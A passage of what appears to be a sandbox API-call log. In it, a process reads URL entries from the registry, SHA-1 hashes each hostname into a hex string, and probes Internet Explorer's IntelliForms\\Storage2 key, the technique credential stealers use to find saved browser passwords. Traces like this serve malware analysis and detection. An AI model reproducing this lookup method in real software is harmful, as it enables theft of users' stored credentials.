(hMem=0x5d667a0) returned 0x0 [0249.356] RegEnumValueW (in: hKey=0x94c, dwIndex=0x6, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url17", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.356] StrStrIW (lpFirst="facebook.com", lpSrch="?") returned 0x0 [0249.356] StrStrIW (lpFirst="facebook.com", lpSrch="http://") returned 0x0 [0249.356] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d3ac10) returned 1 [0249.357] CryptCreateHash (in: hProv=0x5d3ac10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.357] lstrlenW (lpString="facebook.com") returned 12 [0249.357] CryptHashData (hHash=0x5d9db40, pbData=0x43ed4e0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0249.357] CryptGetHashParam (in: hHash=0x5d9db40, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.357] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D0") returned 2 [0249.357] lstrlenW (lpString="") returned 0 [0249.357] lstrlenW (lpString="D0") returned 2 [0249.357] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b34a0 [0249.357] lstrcpyW (in: lpString1=0xd1b34a0, lpString2="" | out: lpString1="") returned="" [0249.357] lstrcatW (in: lpString1="", lpString2="D0" | out: lpString1="D0") returned="D0" [0249.357] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="58") returned 2 [0249.357] lstrlenW (lpString="D0") returned 2 [0249.357] lstrlenW (lpString="58") returned 2 [0249.357] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33950 [0249.357] lstrcpyW (in: lpString1=0x5d33950, lpString2="D0" | out: lpString1="D0") returned="D0" [0249.357] lstrcatW (in: lpString1="D0", lpString2="58" | out: lpString1="D058") returned="D058" [0249.357] LocalFree (hMem=0xd1b34a0) returned 0x0 [0249.357] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="58") returned 2 [0249.357] lstrlenW (lpString="D058") returned 4 [0249.357] lstrlenW (lpString="58") returned 2 [0249.357] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d34170 [0249.357] lstrcpyW (in: lpString1=0x5d34170, lpString2="D058" | out: lpString1="D058") returned="D058" [0249.357] lstrcatW (in: lpString1="D058", lpString2="58" | out: lpString1="D05858") returned="D05858" [0249.357] LocalFree (hMem=0x5d33950) returned 0x0 [0249.357] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0E") returned 2 [0249.357] lstrlenW (lpString="D05858") returned 6 [0249.357] lstrlenW (lpString="0E") returned 2 [0249.357] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33950 [0249.357] lstrcpyW (in: lpString1=0x5d33950, lpString2="D05858" | out: lpString1="D05858") returned="D05858" [0249.357] lstrcatW (in: lpString1="D05858", lpString2="0E" | out: lpString1="D058580E") returned="D058580E" [0249.358] LocalFree (hMem=0x5d34170) returned 0x0 [0249.358] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DC") returned 2 [0249.358] lstrlenW (lpString="D058580E") returned 8 [0249.358] lstrlenW (lpString="DC") returned 2 [0249.358] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33db0 [0249.358] lstrcpyW (in: lpString1=0x5d33db0, lpString2="D058580E" | out: lpString1="D058580E") returned="D058580E" [0249.358] lstrcatW (in: lpString1="D058580E", lpString2="DC" | out: lpString1="D058580EDC") returned="D058580EDC" [0249.358] LocalFree (hMem=0x5d33950) returned 0x0 [0249.358] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="64") returned 2 [0249.358] lstrlenW (lpString="D058580EDC") returned 10 [0249.358] lstrlenW (lpString="64") returned 2 [0249.358] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0ff0 [0249.358] lstrcpyW (in: lpString1=0xd1d0ff0, lpString2="D058580EDC" | out: lpString1="D058580EDC") returned="D058580EDC" [0249.358] lstrcatW (in: lpString1="D058580EDC", lpString2="64" | out: lpString1="D058580EDC64") returned="D058580EDC64" [0249.358] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.358] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A2") returned 2 [0249.358] lstrlenW (lpString="D058580EDC64") returned 12 [0249.358] lstrlenW (lpString="A2") returned 2 [0249.358] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d0650 [0249.358] lstrcpyW (in: lpString1=0xd1d0650, lpString2="D058580EDC64" | out: lpString1="D058580EDC64") returned="D058580EDC64" [0249.358] lstrcatW (in: lpString1="D058580EDC64", lpString2="A2" | out: lpString1="D058580EDC64A2") returned="D058580EDC64A2" [0249.358] LocalFree (hMem=0xd1d0ff0) returned 0x0 [0249.358] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="43") returned 2 [0249.358] lstrlenW (lpString="D058580EDC64A2") returned 14 [0249.358] lstrlenW (lpString="43") returned 2 [0249.358] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d05a0 [0249.358] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="D058580EDC64A2" | out: lpString1="D058580EDC64A2") returned="D058580EDC64A2" [0249.358] lstrcatW (in: lpString1="D058580EDC64A2", lpString2="43" | out: lpString1="D058580EDC64A243") returned="D058580EDC64A243" [0249.358] LocalFree (hMem=0xd1d0650) returned 0x0 [0249.358] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E6") returned 2 [0249.358] lstrlenW (lpString="D058580EDC64A243") returned 16 [0249.358] lstrlenW (lpString="E6") returned 2 [0249.358] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d0de0 [0249.358] lstrcpyW (in: lpString1=0xd1d0de0, lpString2="D058580EDC64A243" | out: lpString1="D058580EDC64A243") returned="D058580EDC64A243" [0249.358] lstrcatW (in: lpString1="D058580EDC64A243", lpString2="E6" | out: lpString1="D058580EDC64A243E6") returned="D058580EDC64A243E6" [0249.358] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.358] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C4") returned 2 [0249.358] lstrlenW (lpString="D058580EDC64A243E6") returned 18 [0249.358] lstrlenW (lpString="C4") returned 2 [0249.358] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd216bb0 [0249.358] lstrcpyW (in: lpString1=0xd216bb0, lpString2="D058580EDC64A243E6" | out: lpString1="D058580EDC64A243E6") returned="D058580EDC64A243E6" [0249.358] lstrcatW (in: lpString1="D058580EDC64A243E6", lpString2="C4" | out: lpString1="D058580EDC64A243E6C4") returned="D058580EDC64A243E6C4" [0249.358] LocalFree (hMem=0xd1d0de0) returned 0x0 [0249.358] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="53") returned 2 [0249.358] lstrlenW (lpString="D058580EDC64A243E6C4") returned 20 [0249.358] lstrlenW (lpString="53") returned 2 [0249.358] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd216c70 [0249.359] lstrcpyW (in: lpString1=0xd216c70, lpString2="D058580EDC64A243E6C4" | out: lpString1="D058580EDC64A243E6C4") returned="D058580EDC64A243E6C4" [0249.359] lstrcatW (in: lpString1="D058580EDC64A243E6C4", lpString2="53" | out: lpString1="D058580EDC64A243E6C453") returned="D058580EDC64A243E6C453" [0249.359] LocalFree (hMem=0xd216bb0) returned 0x0 [0249.359] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="49") returned 2 [0249.359] lstrlenW (lpString="D058580EDC64A243E6C453") returned 22 [0249.359] lstrlenW (lpString="49") returned 2 [0249.359] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd216df0 [0249.359] lstrcpyW (in: lpString1=0xd216df0, lpString2="D058580EDC64A243E6C453" | out: lpString1="D058580EDC64A243E6C453") returned="D058580EDC64A243E6C453" [0249.359] lstrcatW (in: lpString1="D058580EDC64A243E6C453", lpString2="49" | out: lpString1="D058580EDC64A243E6C45349") returned="D058580EDC64A243E6C45349" [0249.359] LocalFree (hMem=0xd216c70) returned 0x0 [0249.359] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8D") returned 2 [0249.359] lstrlenW (lpString="D058580EDC64A243E6C45349") returned 24 [0249.359] lstrlenW (lpString="8D") returned 2 [0249.359] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217030 [0249.359] lstrcpyW (in: lpString1=0xd217030, lpString2="D058580EDC64A243E6C45349" | out: lpString1="D058580EDC64A243E6C45349") returned="D058580EDC64A243E6C45349" [0249.359] lstrcatW (in: lpString1="D058580EDC64A243E6C45349", lpString2="8D" | out: lpString1="D058580EDC64A243E6C453498D") returned="D058580EDC64A243E6C453498D" [0249.359] LocalFree (hMem=0xd216df0) returned 0x0 [0249.359] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="11") returned 2 [0249.359] lstrlenW (lpString="D058580EDC64A243E6C453498D") returned 26 [0249.359] lstrlenW (lpString="11") returned 2 [0249.359] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd215910 [0249.359] lstrcpyW (in: lpString1=0xd215910, lpString2="D058580EDC64A243E6C453498D" | out: lpString1="D058580EDC64A243E6C453498D") returned="D058580EDC64A243E6C453498D" [0249.359] lstrcatW (in: lpString1="D058580EDC64A243E6C453498D", lpString2="11" | out: lpString1="D058580EDC64A243E6C453498D11") returned="D058580EDC64A243E6C453498D11" [0249.359] LocalFree (hMem=0xd217030) returned 0x0 [0249.359] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="4F") returned 2 [0249.359] lstrlenW (lpString="D058580EDC64A243E6C453498D11") returned 28 [0249.359] lstrlenW (lpString="4F") returned 2 [0249.359] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215f90 [0249.359] lstrcpyW (in: lpString1=0xd215f90, lpString2="D058580EDC64A243E6C453498D11" | out: lpString1="D058580EDC64A243E6C453498D11") returned="D058580EDC64A243E6C453498D11" [0249.359] lstrcatW (in: lpString1="D058580EDC64A243E6C453498D11", lpString2="4F" | out: lpString1="D058580EDC64A243E6C453498D114F") returned="D058580EDC64A243E6C453498D114F" [0249.359] LocalFree (hMem=0xd215910) returned 0x0 [0249.359] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="43") returned 2 [0249.359] lstrlenW (lpString="D058580EDC64A243E6C453498D114F") returned 30 [0249.359] lstrlenW (lpString="43") returned 2 [0249.359] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd215840 [0249.359] lstrcpyW (in: lpString1=0xd215840, lpString2="D058580EDC64A243E6C453498D114F" | out: lpString1="D058580EDC64A243E6C453498D114F") returned="D058580EDC64A243E6C453498D114F" [0249.359] lstrcatW (in: lpString1="D058580EDC64A243E6C453498D114F", lpString2="43" | out: lpString1="D058580EDC64A243E6C453498D114F43") returned="D058580EDC64A243E6C453498D114F43" [0249.359] LocalFree (hMem=0xd215f90) returned 0x0 [0249.359] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="21") returned 2 [0249.359] lstrlenW (lpString="D058580EDC64A243E6C453498D114F43") returned 32 [0249.359] lstrlenW (lpString="21") returned 2 [0249.359] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd215290 [0249.359] lstrcpyW (in: lpString1=0xd215290, lpString2="D058580EDC64A243E6C453498D114F43" | out: lpString1="D058580EDC64A243E6C453498D114F43") returned="D058580EDC64A243E6C453498D114F43" [0249.359] lstrcatW (in: lpString1="D058580EDC64A243E6C453498D114F43", lpString2="21" | out: lpString1="D058580EDC64A243E6C453498D114F4321") returned="D058580EDC64A243E6C453498D114F4321" [0249.359] LocalFree (hMem=0xd215840) returned 0x0 [0249.360] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="67") returned 2 [0249.360] lstrlenW (lpString="D058580EDC64A243E6C453498D114F4321") returned 34 [0249.360] lstrlenW (lpString="67") returned 2 [0249.360] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d66340 [0249.360] lstrcpyW (in: lpString1=0x5d66340, lpString2="D058580EDC64A243E6C453498D114F4321" | out: lpString1="D058580EDC64A243E6C453498D114F4321") returned="D058580EDC64A243E6C453498D114F4321" [0249.360] lstrcatW (in: lpString1="D058580EDC64A243E6C453498D114F4321", lpString2="67" | out: lpString1="D058580EDC64A243E6C453498D114F432167") returned="D058580EDC64A243E6C453498D114F432167" [0249.360] LocalFree (hMem=0xd215290) returned 0x0 [0249.360] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B7") returned 2 [0249.360] lstrlenW (lpString="D058580EDC64A243E6C453498D114F432167") returned 36 [0249.360] lstrlenW (lpString="B7") returned 2 [0249.360] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67220 [0249.360] lstrcpyW (in: lpString1=0x5d67220, lpString2="D058580EDC64A243E6C453498D114F432167" | out: lpString1="D058580EDC64A243E6C453498D114F432167") returned="D058580EDC64A243E6C453498D114F432167" [0249.360] lstrcatW (in: lpString1="D058580EDC64A243E6C453498D114F432167", lpString2="B7" | out: lpString1="D058580EDC64A243E6C453498D114F432167B7") returned="D058580EDC64A243E6C453498D114F432167B7" [0249.360] LocalFree (hMem=0x5d66340) returned 0x0 [0249.360] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="1C") returned 2 [0249.360] lstrlenW (lpString="D058580EDC64A243E6C453498D114F432167B7") returned 38 [0249.360] lstrlenW (lpString="1C") returned 2 [0249.360] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67300 [0249.360] lstrcpyW (in: lpString1=0x5d67300, lpString2="D058580EDC64A243E6C453498D114F432167B7" | out: lpString1="D058580EDC64A243E6C453498D114F432167B7") returned="D058580EDC64A243E6C453498D114F432167B7" [0249.360] lstrcatW (in: lpString1="D058580EDC64A243E6C453498D114F432167B7", lpString2="1C" | out: lpString1="D058580EDC64A243E6C453498D114F432167B71C") returned="D058580EDC64A243E6C453498D114F432167B71C" [0249.360] LocalFree (hMem=0x5d67220) returned 0x0 [0249.360] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="84") returned 2 [0249.360] lstrlenW (lpString="D058580EDC64A243E6C453498D114F432167B71C") returned 40 [0249.360] lstrlenW (lpString="84") returned 2 [0249.360] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67840 [0249.360] lstrcpyW (in: lpString1=0x5d67840, lpString2="D058580EDC64A243E6C453498D114F432167B71C" | out: lpString1="D058580EDC64A243E6C453498D114F432167B71C") returned="D058580EDC64A243E6C453498D114F432167B71C" [0249.360] lstrcatW (in: lpString1="D058580EDC64A243E6C453498D114F432167B71C", lpString2="84" | out: lpString1="D058580EDC64A243E6C453498D114F432167B71C84") returned="D058580EDC64A243E6C453498D114F432167B71C84" [0249.360] LocalFree (hMem=0x5d67300) returned 0x0 [0249.360] CryptDestroyHash (hHash=0x5d9db40) returned 1 [0249.360] CryptReleaseContext (hProv=0x5d3ac10, dwFlags=0x0) returned 1 [0249.360] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.360] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.360] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.360] LocalFree (hMem=0x5d67840) returned 0x0 [0249.360] RegEnumValueW (in: hKey=0x94c, dwIndex=0x7, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url16", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.360] StrStrIW (lpFirst="globaloffers.link", lpSrch="?") returned 0x0 [0249.360] StrStrIW (lpFirst="globaloffers.link", lpSrch="http://") returned 0x0 [0249.360] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d37710) returned 1 [0249.361] CryptCreateHash (in: hProv=0x5d37710, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.361] lstrlenW (lpString="globaloffers.link") returned 17 [0249.361] CryptHashData (hHash=0x5d9eda0, pbData=0x43ed4e0, dwDataLen=0x24, dwFlags=0x0) returned 1 [0249.361] CryptGetHashParam (in: hHash=0x5d9eda0, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.361] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C3") returned 2 [0249.361] lstrlenW (lpString="") returned 0 [0249.361] lstrlenW (lpString="C3") returned 2 [0249.361] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b4610 [0249.361] lstrcpyW (in: lpString1=0xd1b4610, lpString2="" | out: lpString1="") returned="" [0249.361] lstrcatW (in: lpString1="", lpString2="C3" | out: lpString1="C3") returned="C3" [0249.361] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="45") returned 2 [0249.361] lstrlenW (lpString="C3") returned 2 [0249.361] lstrlenW (lpString="45") returned 2 [0249.361] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33770 [0249.361] lstrcpyW (in: lpString1=0x5d33770, lpString2="C3" | out: lpString1="C3") returned="C3" [0249.361] lstrcatW (in: lpString1="C3", lpString2="45" | out: lpString1="C345") returned="C345" [0249.361] LocalFree (hMem=0xd1b4610) returned 0x0 [0249.361] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E9") returned 2 [0249.361] lstrlenW (lpString="C345") returned 4 [0249.361] lstrlenW (lpString="E9") returned 2 [0249.361] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33950 [0249.361] lstrcpyW (in: lpString1=0x5d33950, lpString2="C345" | out: lpString1="C345") returned="C345" [0249.361] lstrcatW (in: lpString1="C345", lpString2="E9" | out: lpString1="C345E9") returned="C345E9" [0249.361] LocalFree (hMem=0x5d33770) returned 0x0 [0249.361] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6E") returned 2 [0249.361] lstrlenW (lpString="C345E9") returned 6 [0249.361] lstrlenW (lpString="6E") returned 2 [0249.361] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33770 [0249.361] lstrcpyW (in: lpString1=0x5d33770, lpString2="C345E9" | out: lpString1="C345E9") returned="C345E9" [0249.361] lstrcatW (in: lpString1="C345E9", lpString2="6E" | out: lpString1="C345E96E") returned="C345E96E" [0249.361] LocalFree (hMem=0x5d33950) returned 0x0 [0249.361] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="00") returned 2 [0249.361] lstrlenW (lpString="C345E96E") returned 8 [0249.361] lstrlenW (lpString="00") returned 2 [0249.361] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33950 [0249.361] lstrcpyW (in: lpString1=0x5d33950, lpString2="C345E96E" | out: lpString1="C345E96E") returned="C345E96E" [0249.361] lstrcatW (in: lpString1="C345E96E", lpString2="00" | out: lpString1="C345E96E00") returned="C345E96E00" [0249.362] LocalFree (hMem=0x5d33770) returned 0x0 [0249.362] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2E") returned 2 [0249.362] lstrlenW (lpString="C345E96E00") returned 10 [0249.362] lstrlenW (lpString="2E") returned 2 [0249.362] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1cf940 [0249.362] lstrcpyW (in: lpString1=0xd1cf940, lpString2="C345E96E00" | out: lpString1="C345E96E00") returned="C345E96E00" [0249.362] lstrcatW (in: lpString1="C345E96E00", lpString2="2E" | out: lpString1="C345E96E002E") returned="C345E96E002E" [0249.362] LocalFree (hMem=0x5d33950) returned 0x0 [0249.362] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D6") returned 2 [0249.362] lstrlenW (lpString="C345E96E002E") returned 12 [0249.362] lstrlenW (lpString="D6") returned 2 [0249.362] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d05a0 [0249.362] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="C345E96E002E" | out: lpString1="C345E96E002E") returned="C345E96E002E" [0249.362] lstrcatW (in: lpString1="C345E96E002E", lpString2="D6" | out: lpString1="C345E96E002ED6") returned="C345E96E002ED6" [0249.362] LocalFree (hMem=0xd1cf940) returned 0x0 [0249.362] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="58") returned 2 [0249.362] lstrlenW (lpString="C345E96E002ED6") returned 14 [0249.362] lstrlenW (lpString="58") returned 2 [0249.362] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1cfaa0 [0249.362] lstrcpyW (in: lpString1=0xd1cfaa0, lpString2="C345E96E002ED6" | out: lpString1="C345E96E002ED6") returned="C345E96E002ED6" [0249.362] lstrcatW (in: lpString1="C345E96E002ED6", lpString2="58" | out: lpString1="C345E96E002ED658") returned="C345E96E002ED658" [0249.362] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.362] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="68") returned 2 [0249.362] lstrlenW (lpString="C345E96E002ED658") returned 16 [0249.362] lstrlenW (lpString="68") returned 2 [0249.362] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d00d0 [0249.362] lstrcpyW (in: lpString1=0xd1d00d0, lpString2="C345E96E002ED658" | out: lpString1="C345E96E002ED658") returned="C345E96E002ED658" [0249.362] lstrcatW (in: lpString1="C345E96E002ED658", lpString2="68" | out: lpString1="C345E96E002ED65868") returned="C345E96E002ED65868" [0249.362] LocalFree (hMem=0xd1cfaa0) returned 0x0 [0249.362] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="76") returned 2 [0249.362] lstrlenW (lpString="C345E96E002ED65868") returned 18 [0249.362] lstrlenW (lpString="76") returned 2 [0249.362] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd217570 [0249.362] lstrcpyW (in: lpString1=0xd217570, lpString2="C345E96E002ED65868" | out: lpString1="C345E96E002ED65868") returned="C345E96E002ED65868" [0249.362] lstrcatW (in: lpString1="C345E96E002ED65868", lpString2="76" | out: lpString1="C345E96E002ED6586876") returned="C345E96E002ED6586876" [0249.362] LocalFree (hMem=0xd1d00d0) returned 0x0 [0249.362] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="41") returned 2 [0249.362] lstrlenW (lpString="C345E96E002ED6586876") returned 20 [0249.362] lstrlenW (lpString="41") returned 2 [0249.362] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217030 [0249.362] lstrcpyW (in: lpString1=0xd217030, lpString2="C345E96E002ED6586876" | out: lpString1="C345E96E002ED6586876") returned="C345E96E002ED6586876" [0249.362] lstrcatW (in: lpString1="C345E96E002ED6586876", lpString2="41" | out: lpString1="C345E96E002ED658687641") returned="C345E96E002ED658687641" [0249.362] LocalFree (hMem=0xd217570) returned 0x0 [0249.362] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B0") returned 2 [0249.362] lstrlenW (lpString="C345E96E002ED658687641") returned 22 [0249.362] lstrlenW (lpString="B0") returned 2 [0249.362] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd216a30 [0249.363] lstrcpyW (in: lpString1=0xd216a30, lpString2="C345E96E002ED658687641" | out: lpString1="C345E96E002ED658687641") returned="C345E96E002ED658687641" [0249.363] lstrcatW (in: lpString1="C345E96E002ED658687641", lpString2="B0" | out: lpString1="C345E96E002ED658687641B0") returned="C345E96E002ED658687641B0" [0249.363] LocalFree (hMem=0xd217030) returned 0x0 [0249.363] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="78") returned 2 [0249.363] lstrlenW (lpString="C345E96E002ED658687641B0") returned 24 [0249.363] lstrlenW (lpString="78") returned 2 [0249.363] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd2167f0 [0249.363] lstrcpyW (in: lpString1=0xd2167f0, lpString2="C345E96E002ED658687641B0" | out: lpString1="C345E96E002ED658687641B0") returned="C345E96E002ED658687641B0" [0249.363] lstrcatW (in: lpString1="C345E96E002ED658687641B0", lpString2="78" | out: lpString1="C345E96E002ED658687641B078") returned="C345E96E002ED658687641B078" [0249.363] LocalFree (hMem=0xd216a30) returned 0x0 [0249.363] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="3B") returned 2 [0249.363] lstrlenW (lpString="C345E96E002ED658687641B078") returned 26 [0249.363] lstrlenW (lpString="3B") returned 2 [0249.363] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd215df0 [0249.363] lstrcpyW (in: lpString1=0xd215df0, lpString2="C345E96E002ED658687641B078" | out: lpString1="C345E96E002ED658687641B078") returned="C345E96E002ED658687641B078" [0249.363] lstrcatW (in: lpString1="C345E96E002ED658687641B078", lpString2="3B" | out: lpString1="C345E96E002ED658687641B0783B") returned="C345E96E002ED658687641B0783B" [0249.363] LocalFree (hMem=0xd2167f0) returned 0x0 [0249.363] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="35") returned 2 [0249.363] lstrlenW (lpString="C345E96E002ED658687641B0783B") returned 28 [0249.363] lstrlenW (lpString="35") returned 2 [0249.363] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215ec0 [0249.363] lstrcpyW (in: lpString1=0xd215ec0, lpString2="C345E96E002ED658687641B0783B" | out: lpString1="C345E96E002ED658687641B0783B") returned="C345E96E002ED658687641B0783B" [0249.363] lstrcatW (in: lpString1="C345E96E002ED658687641B0783B", lpString2="35" | out: lpString1="C345E96E002ED658687641B0783B35") returned="C345E96E002ED658687641B0783B35" [0249.363] LocalFree 